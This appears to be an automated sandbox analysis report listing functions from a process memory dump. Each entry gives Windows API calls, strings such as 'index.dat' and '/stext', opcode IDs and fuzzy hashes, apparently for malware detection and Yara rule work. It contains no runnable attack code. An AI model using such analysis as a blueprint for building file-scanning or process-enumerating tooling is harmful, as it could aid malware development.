                      • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                      • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                      Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FileFindFirst
                      • String ID: *.*$index.dat
                      • API String ID: 1974802433-2863569691
                      • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                      • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                      Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@mallocmemcpy
                      • String ID:
                      • API String ID: 3831604043-0
                      • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                      • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                      Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                      Download Yara Rule
                      APIs
                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                      • GetLastError.KERNEL32 ref: 004175A2
                      • GetLastError.KERNEL32 ref: 004175A8
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ErrorLast$FilePointer
                      • String ID:
                      • API String ID: 1156039329-0
                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                      Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$ChangeCloseCreateFindNotificationTime
                      • String ID:
                      • API String ID: 1631957507-0
                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                      Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                      Download Yara Rule
                      APIs
                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Temp$DirectoryFileNamePathWindows
                      • String ID:
                      • API String ID: 1125800050-0
                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                      Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID: d
                      • API String ID: 0-2564639436
                      • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                      • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                      Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: BINARY
                      • API String ID: 2221118986-907554435
                      • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                      • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                      Function 004104FB Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                      • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                        • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                        • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                      • String ID:
                      • API String ID: 1161345128-0
                      • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                      • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                      Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _wcsicmp
                      • String ID: /stext
                      • API String ID: 2081463915-3817206916
                      • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                      • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                      Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                      • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                      • String ID:
                      • API String ID: 159017214-0
                      • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                      • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                      Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                      • String ID:
                      • API String ID: 3150196962-0
                      • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                      • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                      Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: malloc
                      • String ID: failed to allocate %u bytes of memory
                      • API String ID: 2803490479-1168259600
                      • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                      • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                      • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                      • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                      Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                      • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                      • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                      • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                      Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcmpmemset
                      • String ID:
                      • API String ID: 1065087418-0
                      • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                      • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                      Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                        • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                      • String ID:
                      • API String ID: 1481295809-0
                      • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                      • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                      Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                      • String ID:
                      • API String ID: 3150196962-0
                      • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                      • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                      Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                      Download Yara Rule
                      APIs
                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$PointerRead
                      • String ID:
                      • API String ID: 3154509469-0
                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                      Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                      Download Yara Rule
                      APIs
                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfile$StringWrite_itowmemset
                      • String ID:
                      • API String ID: 4232544981-0
                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                      Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                      Download Yara Rule
                      APIs
                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                      Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: AddressProc$FileModuleName
                      • String ID:
                      • API String ID: 3859505661-0
                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                      Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                      Download Yara Rule
                      APIs
                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FileRead
                      • String ID:
                      • API String ID: 2738559852-0
                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                      Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                      Download Yara Rule
                      APIs
                      • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FileWrite
                      • String ID:
                      • API String ID: 3934441357-0
                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                      Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                      Download Yara Rule
                      APIs
                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                      • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                      Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                      • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                      Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
